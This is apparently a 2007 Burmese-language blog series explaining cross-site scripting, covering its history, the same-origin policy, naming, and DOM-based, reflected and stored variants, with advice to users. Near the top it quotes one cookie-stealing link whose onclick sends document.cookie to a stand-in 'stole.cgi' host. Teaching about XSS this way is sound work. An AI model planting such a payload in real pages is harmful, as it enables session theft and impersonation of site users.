    1. ၄င္း၀က္ဘ္ဆိုက္သို႕ လာေရာက္လည္ပတ္ေသာသူမ်ား၏ လတ္တေလာအေျခအေနကို သိမ္းဆည္းထားသည့္ အခ်က္အလက္မ်ား (Session cookies) သို႕မဟုတ္
    2. အျခားေသာ အေထာက္အထားမ်ား ( User name, password စသည္)ကို ထိုသူမ်ား မသိေအာင္ တိုက္ခိုက္သူ၏ Web Server ထံသို႕ တိတ္တဆိတ္ ေပးပို႕ေတာ႕သည္။
  5. ေနာက္ပိုင္းတြင္ တိုက္ခိုက္သူသည္ အျခားေသာသူမ်ားအမည္ျဖင့္ ၀က္ဘ္ဆိုက္ထဲသို႕ ၀င္ ေရာက္ျပီး ထင္ရာလုပ္ႏိုင္ေလသည္။
  6. Session cookie မ်ားခိုးယူႏိုင္ေသာ နမူနာ သေကၤတမ်ား
-< href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here! < /a >-

ဆက္လက္ေဖာ္ျပပါမည္ ....

REF - http://en.wikipedia.org/wiki/Xss

Jul 6, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - အမ်ဳိးအစားမ်ား


အမ်ဳိးအစားမ်ား

အခုအခ်ိန္တြင္ XSS ၏အားနည္းခ်က္မ်ားကို အမ်ဳိးအစားသံုးမ်ဳိးျဖင့္ ေဖာ္ျပၾကသည္။
၄င္းတို႕ကို အေခၚရလြယ္ေစရန္ အားနည္းခ်က္ (၁)(၂)(၃) ဟု အမည္ေပးလိုက္ပါမည္။

အားနည္းခ်က္ (၁)

XSS ၏အားနည္းခ်က္(၁) ကို DOM-based သို႕မဟုတ္ Local cross-site scripting ဟုေျပာၾကသည္။ ျပႆနာက တျခားေနရာမွာ မရွိဘဲ ၄င္းအင္တာနက္ စာမ်က္ႏွာအတြင္းမွာပင္ ရွိေနသည္္။ ဥပမာ - ဆိုၾကပါစို႕
  • အကယ္၍ JavaScript သေကၤတ တစ္ခုသည္ အင္တာနက္လိပ္စာ (URL) တစ္ခုကို ေတာင္းဆိုသည့္ ေဆာင္ရြက္ခ်က္တစ္ခုကို ျပဳလုပ္ျပီးေနာက္
  • ရရွိလာေသာ အခ်က္အလက္မ်ားကို အသံုးျပဳျပီး
  • မူလစာမ်က္ႏွာအတြင္းမွာပင္ HTML အခ်ဳိ႕ျပန္ေရးလိုက္သည့္ အခါမ်ဳိးတြင္ XSS ဂယ္ေပါက္(hole) တစ္ခုျဖစ္လာသည္။
လက္ေတြ႕အားျဖင့္ အားနည္းခ်က္(၁)မွာ (၂)ႏွင့္ အေတာ္ေလးဆင္တူသည္။အလြန္အေရးၾကီးေသာ အခ်က္တစ္ခ်က္တြင္သာလွ်င္ ကြဲလြဲမႈရွိေနသည္။
  • Internet Explorer ေဆာ့ဖ္၀ဲ၏ Local Zone ဟုေခၚေသာ၊ အင္တာနက္သံုးေနသူမ်ား၏ ဟာ့ဒ္ဒစ္အတြင္းရွိ Client-site script မ်ားကိုကိုင္တြယ္ လုပ္ေဆာင္ပံုေၾကာင့္၊
  • အားနည္းခ်က္(၁)မွတဆင့္ အေ၀းမွ ထိမ္းေက်ာင္းႏိုင္ေသာ အေနအထားမ်ဳိးအထိ ျဖစ္သြားေစႏိုင္သည္။
ဥပမာ -
  • တိုက္ခိုက္သူတစ္ဦးသည္ ေကာက္က်စ္ေသာ ၀က္ဘ္ဆိုက္တစ္ခုကို အသံုးျပဳလ်က္ရွိေနသည္။
  • ၄င္းဆိုက္တြင္ အင္တာနက္သံုးေနသူတစ္ဦး၏ ကြန္ပ်ဳတာအတြင္းရွိ ဂယ္ေပါက္ျဖစ္ေနေသာ စာမ်က္ႏွာတစ္ခုႏွင့္ ခ်ိတ္ဆက္မႈ(Link)တစ္ခုပါ၀င္ေနသည့္ ဆိုပါစို႕။
  • ထိုအခါတြင္ တိုက္ခိုက္သူသည္ သားေကာင္၏ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ အတြင္းမွ ဟာကြက္ကိုေကာင္းစြာအသံုးခ်ျပီး ၄င္းလိုရာ သေကၤတမ်ားကို သားေကာင္၏ ကြန္ပ်ဳတာအတြင္းသို႕ တိတ္တဆိတ္ ထည့္သြင္းလိုက္ႏိုင္သည္။
အားနည္းခ်က္ (၂)

အားနည္းခ်က္ (၂)ကို non-persistent သို႕မဟုတ္ reflected ေပ်ာ႕ကြက္ ဟုေျပာၾကသည္။ အျမဲတမ္း ရွိမေနဘဲ အေျခအေနအခ်ဳိ႕အေပၚမူတည္ျပီး ျဖစ္လာသည့္ ေပ်ာ႕ကြက္ျဖစ္သည္ ဟု ဆိုႏိုင္သည္။ အမ်ားဆံုးျဖစ္ေလ့ရွိေသာ ေပ်ာ႕ကြက္လည္းျဖစ္သည္။
  • ဆာဗာဘက္ျခမ္းရွိ သေကၤတမ်ား (Server-site scripts)အေနျဖင့္ အင္တာနက္သံုးေနသူ တစ္ဦးမွ ထည့္သြင္းေပးလိုက္ေသာ အခ်က္အလက္မ်ားကို အသံုးျပဳျပီး
  • ၄င္းအင္တာနက္သံုးသူအတြက္ လိုအပ္ေသာ စာမ်က္ႏွာတစ္ခုကို
  • ေျဖၾကားခ်က္အျဖစ္ ခ်က္ခ်င္းျပန္လည္ ေပးပို႕ရေလ့ရွိသည္။
  • အကယ္အားျဖင့္ အသံုးျပဳသူမ်ား ထည့္ေပးလိုက္သည့္ အခ်က္အလက္မ်ားကို စနစ္တက် စစ္ေဆးျခင္းမျပဳဘဲ (Unvalidated User-supplied Data အျဖစ္) လက္ခံမိလိုက္သည့္အခါ၊
  • ၄င္းအခ်က္အလက္မ်ားမွာ ဆာဗာမွ ျပန္လည္ေပးပို႕လိုက္သည့္ စာမ်က္ႏွာမ်ားထဲတြင္ ပါ၀င္ သြားသည္။
  • ဤအေျခအေနမ်ဳိးက အသံုးျပဳသူဘက္ရွိ သေကၤတမ်ားကို အသက္၀င္ေျပာင္းလဲေနေသာ (Dynamic) စာမ်က္ႏွာတစ္ခု အတြင္းသို႕ ထည့္ေပးလိုက္သလို ျဖစ္သြားေစသည္။
စံအျဖစ္ေဖာ္ျပေလ့ရွိေသာ ဥပမာမွာ ရွာေဖြေရး၀က္ဘ္ဆိုက္မ်ား (Search Engines) တြင္ျဖစ္သည္။
  • အကယ္၍ တစ္စံုတစ္ေယာက္သည္ ရွာေဖြေရး၀က္ဘ္ဆိုက္တစ္ခုတြင္ ရွာေဖြလိုသည့္ စကားလံုးမ်ား ထည့္သြင္းသည့္အခါ
  • HTML မွ အထူးသေကၤတအခ်ဳိ႕ကို ထည့္သြင္းရွာေဖြလိုက္သည္ဆိုပါစို႕၊
  • ထိုအခါတြင္ ထိုသူ ထည့္သြင္းရွာေဖြလိုက္ေသာ စာေၾကာင္းမ်ားကို
    • ရရွိလာေသာ အေျဖမ်ားထဲတြင္ ျပန္လည္ထည့္သြင္း ေဖာ္ျပေပးျခင္း သို႕မဟုတ္
    • ရွာေနေသာ အေၾကာင္းအရာကို အလြယ္တကူ ျပန္လည္ျပင္ဆင္ႏိုင္ရန္အတြက္ ျပန္လည္ေဖာ္ျပေပးျခင္းမ်ုဳိးကို မျဖစ္မေနေဆာင္ရြက္ေပးရသည္။
  • အကယ္၍ ထည့္ေပးလိုက္ေသာ အသံုးအႏႈံးမ်ားအားလံုးတြင္ HTML အတြက္ အက်ဳံးမ၀င္ေသာ အခ်က္အလက္မ်ား ပါလာသည့္အခါ XSS ဂယ္ေပါက္ တစ္ခု ျဖစ္လာသည္။




အစပိုင္းတြင္ ဤျဖစ္ရပ္မွာ-
  • အင္တာနက္သံုးသူမ်ားအေနျဖင့္ မိမိ၏အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲအတြင္းရွိ စာမ်က္ႏွာမ်ားတြင္သာ သေကၤတမ်ား ျပန္လည္ထည့္သြင္းလိုက္သလိုမွ်သာ ျဖစ္ေနေသာေၾကာင့္
  • ဆိုးဆိုးရြားရြား ျပႆနာတစ္ရပ္အေနျဖင့္ ေပၚလာခဲ့ျခင္း မရွိေပ။
  • သို႕ရာတြင္ တိုက္ခိုက္မွဳလုပ္ေဆာင္လိုသူတစ္ဦးအေနျဖင့္ Social Engineering နည္းပညာအခ်ဳိ႕ကို အသံုးျပဳျပီး
    • အင္တာနက္သံုးသူတစ္ဦးထံသို႕
    • ၄င္းအတြက္ အလုပ္လုပ္ေပးမည့္ သေကၤတမ်ား ပါ၀င္ေနေသာ စာမ်က္ႏွာတစ္ခုထံသို႕ ေရာက္ရွိေစမည့္ အင္တာနက္လိပ္စာတစ္ခုကို ဖြင့္ၾကည့္မိေစရန္ စည္းရုံးသိမ္းသြင္း ႏိုင္ေစသည့္ အခြင့္အေရး ရရွိေစႏိုင္လာသည္။
(Social Engineering - မသိနားမလည္သူ၊ အင္တာနက္သံုးသူမ်ား၏ အားနည္းခ်က္ကို အခြင့္ေကာင္းယူျပီး ထိုသူမ်ားထံမွ အေရးၾကီးေသာ ကိုယ္ေရးအခ်က္အလက္မ်ား ေငြေၾကးဆိုင္ရာအခ်က္အလက္မ်ား လွည့္ပတ္ရယူျပီး အျမတ္ထုတ္ျခင္း - သီးျခားေဖာ္ျပပါမည္)

အားနည္းခ်က္ (၃)

အားနည္းခ်က္ (၃)ကို သိမ္းဆည္းထားေသာ (သို႕) အျမဲရွိေနေသာ (သို႕) ဒုတိယအဆင့္ ေပ်ာ႕ကြက္၊အားနည္းခ်က္ ဟု ေျပာေလ့ ရွိၾကသည္။ အစြမ္းအထက္ဆံုးေသာ တိုက္ခိုက္မႈအမ်ဳိးအစားမ်ား ျဖစ္ေပၚေစႏိုင္သည္။
ဥပမာတစ္ခု အေနျဖင့္
  • အင္တာနက္ေပၚရွိေနရာ (သို႕) ဆာဗာ (သို႕) ဖိုင္သိုေလွာင္သိမ္းဆည္းေရးစနစ္ တစ္ခုခု အတြင္းသို႕ အသံုးျပဳေနသူတစ္ဦးက (ပထမလူ-တိုက္ခိုက္သူူ) အခ်က္အလက္မ်ားကို ေပးပို႕ ထည့္သြင္းသိမ္းဆည္းလိုက္သည္။
  • ေနာက္တစ္ခ်ိန္တြင္ အျခားေသာ အသံုးျပဳသူတစ္ဦးက (ဒုတိယလူ-သားေကာင္) ၄င္းစာမ်က္ႏွာကို ဖြင့္ၾကည့္လိုက္မိသည့္အခါတြင္ တိုက္ခိုက္သူဆင္ထားေသာ ေထာင္ေခ်ာက္ထဲသို႕ ေရာက္ရွိသြားရေတာ႕သည္။
  • အထူး စံထားျပသႏိုင္သည့္ ဥပမာတစ္ရပ္မွာ Online Message Boards မ်ားျဖစ္သည္။
  • ၄င္းေနရာမ်ားသည္ အျခားေသာ ၾကည့္ရႈသူမ်ားဖတ္ရႈႏိုင္ရန္အတြက္ HTML သေကၤတမ်ားကို ထည့္သြင္းႏိုင္ရန္ လမ္းဖြင့္ေပးထားျခင္း ေၾကာင့္ျဖစ္သည္။
ဤအားနည္းခ်က္မ်ားမွာ အမ်ားအားျဖင့္ အျခားေသာအမ်ဳိးအစားမ်ားထက္ သိသိသာသာ အက်ဳိးသက္ေရာက္မႈျဖစ္ေစသည္။ အေၾကာင္းမွာ တိုက္ခိုက္သူတစ္ဦး အေနျဖင့္ သေကၤတ (Script) အခ်ဳိ႕ထည့္သြင္းေပးလိုက္ရုံသာ ျဖစ္ျပီး အျခားေသာ သားေကာင္ အေျမာက္အမ်ားကို တိုက္ခိုက္ႏိုင္ေသာေၾကာင့္ ျဖစ္ေပသည္။

သားေကာင္၏ ကြန္ပ်ဳတာမ်ားအတြင္းသို႕ သေကၤတမ်ား ထည့္သြင္းတိုက္ခိုက္ပံု နည္းစနစ္မ်ား (Methods of Injection) မွာ အမ်ဳိးမ်ဳိး ေျပာင္းလဲေနႏိုင္သည္။
  • တိုက္ခိုက္သူတစ္ဦးသည္ အထက္တြင္ေဖာ္ျပထားခဲ့ေသာ ေပ်ာ့ကြက္၊ ဟာကြက္မ်ား သားေကာင္၏ ကြန္ပ်ဳတာေပၚတြင္ ျဖစ္ေပၚလာေစရန္အတြက္ အင္တာနက္အသံုခ်ေဆာ့ဖ္၀ဲ (Web Application) တစ္ခုခုကို အသံုးျပဳရန္ လိုခ်င္မွ လိုမည္ျဖစ္သည္။
  • အင္တာနက္ အသံုးခ်ေဆာ့ဖ္၀ဲ (အီးေမးလ္ ၊ System log စသည့္) အရာတစ္ခုခုမွ လက္ခံရရွိလိုက္သည့္ (တိုက္ခိုက္သူတစ္ဦးမွ ထိန္းခ်ဳပ္ထားႏိုင္ေခ်ရွိေနေသာ) မည္သည့္ အခ်က္အလက္မဆိုသည္ အသက္၀င္ ေနေသာ စာမ်က္ႏွာတစ္ခုအျဖစ္ (Dynamic page) ျပန္လည္ေဖာ္ျပရမည့္ေနရာတြင္
  • ရွိသင့္ရွိထိုက္ေသာ သက္ဆိုင္ရာ သေကၤတမ်ားျဖင့္ အျပည့္အ၀ ပါရွိေနရမည္ ျဖစ္သည္။
  • အကယ္၍ ပါရွိမေနပါက ရလာဒ္အေနျဖင့္ XSS ဆိုင္ရာ ဂယ္ေပါက္ တစ္ခု ျဖစ္ေပၚလာမည္ ျဖစ္ေပသည္။
အေျခအေနအမ်ဳိးမ်ဳိးေၾကာင့္ အခုေဖာ္ျပထားတာေတြကို အေတာ္ေလးအခ်ိန္ယူ ဘာသာျပန္လိုက္ရပါတယ္ ... နည္းပညာ တစ္ခုျဖစ္ေနတာေရာ ကိုယ္နဲ႕ေ၀းတဲ့ အေၾကာင္းအရာတစ္ခုျဖစ္ေနတာေၾကာင့္ေရာ အေတာ္ေလး ေခါင္းစားခဲ့ပါတယ္ ပညာလည္း အေတာ္ရလိုက္ပါတယ္ ... အခုေဖာ္ျပထားတာေတြက မျပည့္စံုေသးပါဘူး စာေၾကာင္းေတြက ရွည္ေနတဲ့ အတြက္ သည္းခံဖတ္ေပးေစခ်င္ပါတယ္ ... ေနာက္ထပ္ ဆက္ျပီး ဘယ္လို အတိုက္ခိုက္ခံရႏိုင္တာလဲ ... ဘယ္လို အကာအကြယ္ေတြ လုပ္မလဲ ဆိုတာေတြကို နမူနာေတြ ရုပ္ရွင္ေတြနဲ႕ ရွာေဖြ ေဖာ္ျပသြားမွာပါ ....

ဆက္လက္ေဖာ္ျပပါမည္ ....

Jun 29, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - အသံုးအႏႈံးမ်ား


အသံုးအႏႈံးမ်ား
အေစာပိုင္းကာလေတြတုန္းကေတာ႕
CSS လို႕အတိုေကာက္ ေျပာရင္ Cross-Side Scripting ရဲ႕ အားနည္းခ်က္ေတြကို ေျပာတယ္ဆိုတာ
နားလည္ခဲ့ၾကပါတယ္။ ဒါေပမယ့္လည္း ေနာက္ပိုင္းမွာ ဆက္လက္ထြက္ေပၚလာတဲ့ -

  • Cascading-Style Sheets - အင္တာနက္စာမ်က္ႏွာေတြ ေရးသားတ့ဲအခါ အဆင္အျပင္ ပိုျပီးၾကည့္ေကာင္းေအာင္ အသံုးျပဳရတဲ့ ဘာသာစကားတစ္မ်ဳိး နဲ႕
  • Content Scrambling System - စီးပြားျဖစ္ထုတ္လုပ္တဲ့ ဒီဗီြဒီေတြမွာအထဲမွာပါ၀င္တဲ့ အေၾကာင္းအရာေတြကို အျခားသူေတြ အလြယ္တကူ ၾကည့္လို႕မရေအာင္ ဖန္တီး(Encrypt) လုပ္ထား၊ ေရာေမႊထားတဲ့နည္းစနစ္
ေတြရဲ႕ အတိုေကာက္ စာလံုးေတြနဲ႕ မွားယြင္းစရာ ျဖစ္လာပါတယ္ ...

Steve Champeon

XSS ဆိုတဲ့ အတိုေကာက္စကားလံုးကို ပထမဆံုးစျပီးသံုးခဲ့တဲ့ သူကေတာ့ Steve Champeon ဆိုတဲ့ပုဂၢိဳလ္ျဖစ္ပါတယ္။ သူဟာ webmonkey.com ဆိုတဲ့ အင္တာနက္စာမ်က္ႏွာေတြ ေရးသားတည္ေဆာက္တဲ့ နည္းလမ္းေတြအေၾကာင္း အစကေန အဆံုးအထိ အမ်ဳိးမ်ဳိးရွင္းျပထားတဲ့ Online Tutorial ၀က္ဘ္ဆိုဒ္မွာ "XSS, Trust, and Barney" ဆိုတဲ့ ေခါင္းစဥ္နဲ႕ Cross-Side Scripting အေၾကာင္းကို XSS ဆိုတဲ့ အေခၚအေ၀ၚနဲ႕ စတင္ေရးသားခဲ့တာပါ။ ေနာက္ပိုင္းမွာ လံုျခံဳေရးနည္းပညာ အသိုင္းအ၀ိုင္းတစ္ခုလံုးက ဒီအေျပာင္းအလဲကို အလ်င္အျမန္ပဲ လက္ခံအသံုးျပဳခဲ့ၾကပါတယ္။

အခုအခ်ိန္မွာဆိုရင္ Cross-Side Scripting ကို CSS ရယ္လို႕ အလြန္အသံုးနည္းသြားပါျပီ။
သံုးထားခဲ့ျပီးသား အင္တာနက္စာမ်က္ႏွာအခ်ဳိ႕မွာပဲ က်န္ေနပါေတာ႕တယ္ ...

(ေနာက္လာမယ့္ အေၾကာင္းအရာေတြက ပညာရပ္ပိုင္းဆိုင္ရာ အခက္အခဲေလးေတြရွိေနလို႕ အခ်ိ္န္ေပး ေလ့လာ ဘာသာျပန္ေနရတဲ့ အတြက္ ဒီေနရာမွာပဲ ခဏေလး ရပ္ထားပါ့မယ္ ... ေနာက္ေန႕ မွာ XSS ရဲ႕ေပ်ာ့ကြက္ေတြကို အသံုးခ်ျပီး တိုက္ခိုက္ခံရႏိုင္တဲ့နည္းလမ္းေတြကို ဆက္လက္ေဖာ္ျပေပးပါ့မယ္ ...)

  • webmonkey.com ဆိုတဲ့ ဆိုဒ္ေလးကိုလည္း သြားေလ့လာၾကည့္ၾကဖို႕ web development အေၾကာင္းေလ့လာခ်င္တဲသူေတြကို တိုက္တြန္းခ်င္ပါတယ္ ...
ဆက္လက္ေဖာ္ျပပါမည္ ....


Jun 26, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - မူလေနရာတူညီျခင္း


မူလေနရာတူညီျခင္း

အဓိကအားျဖင့္ေတာ႕ အင္တာနက္ၾကည့္ေဆာဖ့္၀ဲေတြဟာ လက္ရွိေနရာ(စာမ်က္ႏွာ)ကေန အျပင္ဘက္တစ္ေနရာကို ခုန္ကူးရတဲ့ အခါမွာ လံုျခံဳမႈရရွိေစဖို႕အတြက္ Same origin policy ဆိုတဲ့နည္းလမ္းတစ္ခုကို အသံုးျပဳၾကပါတယ္။ JavaScript မွာအသံုးမ်ားပါတယ္။ ဒီနည္းလမ္းကို သံုးလိုက္တဲ့ အတြက္တစ္ေနရာကေန ေနာက္တစ္ေနရာကို သြားရေတာ႕မယ္ဆိုရင္ စိတ္ခ်လက္ခ် သြားလို႕ရပါတယ္။

ဒီနည္းလမ္းေလးရဲ႕ အလုပ္လုပ္ပံုေလးကို ေအာက္မွာ ဇယားေလးနဲ႕ ရွင္းျပထားပါတယ္။
တစ္ေနရာကေန ေနာက္တစ္ေနရာေျပာင္းအကူးအေျပာင္းမွာ
Domain ေတြအခ်င္းခ်င္း Prorocol ေတြအခ်င္းခ်င္း တူေနမွ အေျပာင္းအလဲကို ဆက္လုပ္ႏိုင္ေအာင္ လုပ္ေပးတဲ့နည္းျဖစ္ပါတယ္ …
ဒီနည္းေၾကာင့္ ေကာက္က်စ္စဥ္းလဲတဲ့ ၀က္ဘ္ဆိုက္တစ္ခုဟာ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲရဲ႕ ဖြင့္ထားတဲ့ အျခား window တစ္ခုအတြင္းမွာ ရွိေနတဲ့ အေရးၾကီးတဲ့ အခ်က္အလက္ေတြကို JavaScript အသံုးျပဳျပီး မခိုးယူႏိုင္မွာ ျဖစ္ပါတယ္ …. (ကြန္ပ်ဳတာထဲက အခ်က္အလက္ေတြကို ေျပာတာမဟုတ္ …)

Origin ဆိုတဲ့ အသံုးအႏႈံးက မူလစာမ်က္ႏွာ နဲ႕ ေနာက္ထပ္သြားရမယ့္ စာမ်က္ႏွာေတြၾကားမွာ
အသံုးျပဳထားတဲ့ domain name, protocol နဲ႕ port ေတြ တူေနရမယ္လို႕ ဆိုလိုပါတယ္။ အင္တာနက္ စာမ်က္ႏွာေတြၾကားမွာ အဲဒီအခ်က္ သံုးခ်က္တူညီမႈရွိေနတာကို မူလေနရာတူညီျခင္း Same Origin လို႕ဆိုလိုပါတယ္။ ဒီလိုတူေနမွ စာမ်က္ႏွာတစ္ခုကေန ေနာက္တစ္ခုေျပာင္းရတဲ့အခါ ပါသြားမယ့္ အခ်က္အလက္အခ်ဳိ႕ အတြက္ စိတ္ခ်ရတဲ့ သေဘာပါ။

အထက္က ဇယားေလးကို ေသေသခ်ာခ်ာ ေလ့လာလိုက္ရင္
..www.example.com/dir/page.html.. ဆိုတဲ့ေနရာကေန တျခားေနရာေတြကို သြားျပထားတာ ျဖစ္ပါတယ္ -

  • အေပၚဘက္ႏွစ္ခုကေတာ႕ Same Origin ျဖစ္ျပီးလို႕ဆက္သြားလို႕ရျပီး
  • ေအာက္ဘက္ကေလးခုမွာ protocol မတူတာ၊
  • host (domain) အမည္မတူတာ၊
  • port မတူတာ ေတြေၾကာင့္ အကူးအေျပာင္း မလုပ္ေပးတာ ျမင္ရမွာ ျဖစ္ပါတယ္ …

ဒီသေဘာေလးက ျပင္ပေလာကမွာလည္း အတူတူပါပဲ။ တစ္နယ္တည္းသားအခ်င္း၊ တစ္တန္းတည္းသား အခ်င္းခ်င္း၊ တစ္အိမ္တည္းသားခ်င္း၊ တစ္ေက်ာင္းတည္းထြက္ခ်င္း အစ ရွိတဲ့ မူလေနရာ (Same Origin) တူတဲ့သူ အခ်င္းခ်င္း စိတ္ခ်လက္ခ် ေပါင္းလို႕ရတဲ့ သေဘာအတိုင္းပါပဲ ….
(ခၽြင္းခ်က္ေလးေတြ ရွိႏိုင္တာကို ခဏဖယ္ျပီး စဥ္းစားတာပါ…)

Netscape ကသူ႕ရဲ႕ JavaScript မွာ အဲဒီနည္းလမ္းေလးကို စတင္လိုက္တဲ့အခ်ိန္ကစျပီးေတာ႕
အင္တာနက္အသံုးျပဳသူေတြကို ေကာက္က်စ္စဥ္းလဲတဲ့ website ေတြရဲ႕ အႏၱရာယ္ကေန အကာအကြယ္ေပးႏိုင္ေအာင္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ အမ်ဳိးမ်ဳိးနဲ႕ အင္တာနက္အသံုးျပဳသူေတြအတြက္ေရးေပးရတဲ့ (client-side scripting) ပရိုဂရမ္ ဘာသာစကားအမ်ဳိးမ်ဳိးမွာ အလားတူနည္းလမ္း ေတြကို သံုးျပီး အကာအကြယ္ေပးလာ ၾကပါတယ္။

ေယဘုယ်အားျဖင့္ေတာ႕ Cross-site Scripting ဆိုတာဟာ အင္တာနက္ စာမ်က္ႏွာေတြရဲ႕ ေပ်ာ့ကြက္ေတြ၊ အားနည္းခ်က္ေတြကို မသမာသူေတြက ရွာေဖြျပီး သူတို႕ လိုခ်င္တဲ့ ေနရာ၊ လမ္းေၾကာင္းေပၚကို ေရာက္ေအာင္ ဆြဲေခၚသြားတဲ့ နည္းလမ္းေတြပါပဲ ….
မသမာသူတစ္ဦးဟာ အျခားေသာ အင္တာနက္ေနရာ (Domain) မ်ားမွာ တည္ရွိအသံုးျပဳေနတဲ့ စာမ်က္ႏွာမ်ားအတြင္းကို ေကာက္က်စ္ဆိုးရြားတဲ့ သေကၤတေတြ (scripts) ကို နည္းအမ်ဳိးမ်ဳိးနဲ႕ ရွာေဖြထည့္သြင္းျပီး ၊ စာမ်က္ႏွာတစ္ခုအတြင္းမွာပါတဲ့ အေရးၾကီးတဲ့ ကိုယ္ေရးကိုယ္တာအေၾကာင္းအရာေတြ၊ session cookie နဲ႕ အျခားေသာ အေၾကာင္းအရာေတြကို တစ္ဆင့္ျပီးတစ္ဆင့္ ရရွိ အသံုးျပဳသြားႏိုင္တယ္ ဆိုတာေလးကို ေသေသခ်ာခ်ာေလး နားလည္ထားဖို႕ အေရးၾကီးပါတယ္ …

အခုလို သိထားမယ္ဆိုရင္-

  • လင့္ခ္ ေတြ႕တိုင္း ကလစ္လုပ္တာမ်ဳိး၊
  • ပံု လွလွေလး (လွလွေလး :P) ေတြ႕လို႕ ကလစ္လုပ္တာမ်ဳိး ၊
  • စိတ္၀င္းစားေလာက္စရာ စာေၾကာင္းေလးေတြ႕လို႕ ကလစ္လုပ္တာမ်ဳိးေတြကို လုပ္မိေတာ့မယ္ဆိုရင္ အနည္းနဲ႕ အမ်ား သတိထားေနမိေတာ႕မွာ ေသခ်ာပါတယ္ …..

ေအာက္က ဗီဒီယိုေလးကို ျပန္ၾကည့္လိုက္ပါဦးလား ...
ပိုျပီး သေဘာေပါက္သြားတာေပါ့ ….



ဆက္လက္ေဖာ္ျပပါမည္ ....


Jun 25, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - ေနာက္ခံသမိုင္းေၾကာင္း


Cross site scripiting ကို အတိုေကာက္ CSS လို႕ပဲ ေခၚတာပါပဲ။
ဒါေပမယ့္ အခုေတာ႕ မသံုးေတာ႕ပါဘူး။

Netscape ေဆာ့ဖ္၀ဲ ကုမၼဏီဟာ Java Script ဘာသာစကားကို ပထမဆံုးမိတ္ဆက္လိုက္တဲ့ အခ်ိန္က web server တစ္ခုကေန အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ ေတြဆီကို အလုပ္လုပ္ႏိုင္တဲ့ သေကၤတ (executable code) ေတြပို႕လႊတ္ႏိုင္တဲ့အတြက္ လံုျခံဳေရးဆိုင္ရာ စြန္႔စားမႈတစ္ရပ္ ဆိုတာကို သိခဲ့ၾက ပါတယ္။

ဒါနဲ႕ ပါတ္သက္တဲ့ အဓိက ေသာ႕ခ်က္ျပႆနာတစ္ရပ္ကေတာ႕ user ေတြက တျပိဳင္တည္းမွာ browser ၀င္းဒိုးေတြ အမ်ားၾကီးကို ဖြင့္တဲ့အခ်ိန္ပါဘဲ။ အခ်ိဳ႕ အေျခအေနေတြမွာ စာမ်က္ႏွာ တစ္ခုမွာပါေနတဲ့ Script ေတြကအျခားစာမ်က္ႏွာတစ္ခု သို႕မဟုတ္ အျခားစာမ်က္ႏွာထဲက အရာ၀တၳဳ တစ္ခုခုဆီကို လွမ္းျပီး ဆက္သြယ္တာကို အေျခအေနအရ ကိုယ္ကိုယ္တိုင္က ခြင့္ျပဳေပးရတာမ်ဳိး ရွိတတ္ပါတယ္။

အထူးသျဖင့္ မလႊဲမေရွာင္သာခြင့္ျပဳေနရတာေတြ ကေတာ႕ -

  • email ေတြထဲမွာပါလာတဲ့ လိပ္စာေတြ
  • တျခားျပင္ပ စာမ်က္ႏွာတစ္ခုကို လွမ္းဖြင့္ရမယ့္ link (external link) ေတြ
  • ကလစ္လုပ္ျပီးၾကည့္မွ ျမင္ရမယ့္ ရုပ္ပံုေတြ
  • ေဒါင္းလုဒ္ ခ်မွရမယ့္ ဖိုင္ေတြ - ျဖစ္ပါတယ္


ဒါေပမယ့္ ဒီလို လုပ္တဲ့အခါမ်ုိးမွာ အထူးသတိထားဖို႕ လိုအပ္ပါတယ္။
ေကာက္က်စ္စဥ္းလဲတဲ့ ၀က္ဘ္ဆိုက္ တစ္ခုခုက ကိုယ့္ဆီကေန သူတို႕လိုခ်င္တဲ့ အခ်က္အလက္ေတြကို ဒီနည္းနဲ႕ ဆြဲယူသြားႏိုင္လို႕ ပဲျဖစ္ပါတယ္။ ဘယ္လို လုပ္သြားတာလဲ နည္းနည္းေလ့လာ ၾကည့္ၾက ပါစို႕လား ။

ကၽြန္ေတာ္တို႔တေတြ လင့္ခ္တစ္ခုခုကို (ဥပမာ - www.examplewebsite.com) ကလစ္ လုပ္လိုက္ျပီဆိုတာနဲ႔ ကၽြန္ေတာ္တို႔ိရဲ႕ အင္တာနက္ၾကည့္တဲ့ ေဆာ့ဖ္၀ဲက အဲဒီလိပ္စာအတိုင္း လိုက္သြားျပီးေတာ႕ အဲဒီလင့္ခ္နဲ႕ဆိုင္တဲ့ စာမ်က္ႏွာ၊ ရုပ္ပံု အစရွိတဲ့ အရာတစ္ခုခု (သို႕မဟုတ္) အမ်ားကို ဖြင့္ခြင့္ေပးဖို႕ Servrer ကေနေတာင္းဆိုတဲ့အလုပ္ ကိုလုပ္ပါတယ္။

အဲဒီအခါမွာပဲ အဲဒီ Server နဲ႕ ကၽြန္ေတာ္တို႔ကြန္ပ်ဳတာ အဆက္အသြယ္ရေနျပီ ျဖစ္ပါတယ္။ ကိုယ္ကေတာ႕ လင့္ခ္ေလးတစ္ခုကို ကလစ္လုပ္လိုက္တာပါဘဲ .... ဒါေပမယ့္ ေနာက္ကြယ္က ကိုယ္မျမင္ရတဲ့ေနရာမွာ အေျပာင္းအလဲေတြ အမ်ားၾကီးျဖစ္သြားပါတယ္။ အရမ္းသတိထားရမယ့္ အလုပ္တစ္ခုပါ။
အဲဒီအခ်ိန္မွာပဲ Server ကေပးပို႕လိုက္တဲ့ အရာေတြက ကိုယ့္ရဲ႕ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲေပၚမွာ အလုပ္လုပ္ေနျပီျဖစ္ပါတယ္ ...
ပိုျပီးရွင္းရွင္းလင္းလင္း ျမင္ခ်င္တယ္ဆိုရင္ေတာ႕ အင္တာနက္လိပ္စာတစ္ခုကို ဖြင့္ေနတုန္းမွာ ကိုယ့္ရဲ႕ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲရဲ႕ Status bar ကို ေစာင့္ၾကည့္ေနလိုက္ပါ …
  • connecting to www.servername.com ….
  • waiting for www.servername.com ....
  • transferring dada from www.servername.com ….
  • opening page www.servername.com ….
  • Sendig request to www.servername.com ……
  • receiving items from www.servernames.com ….
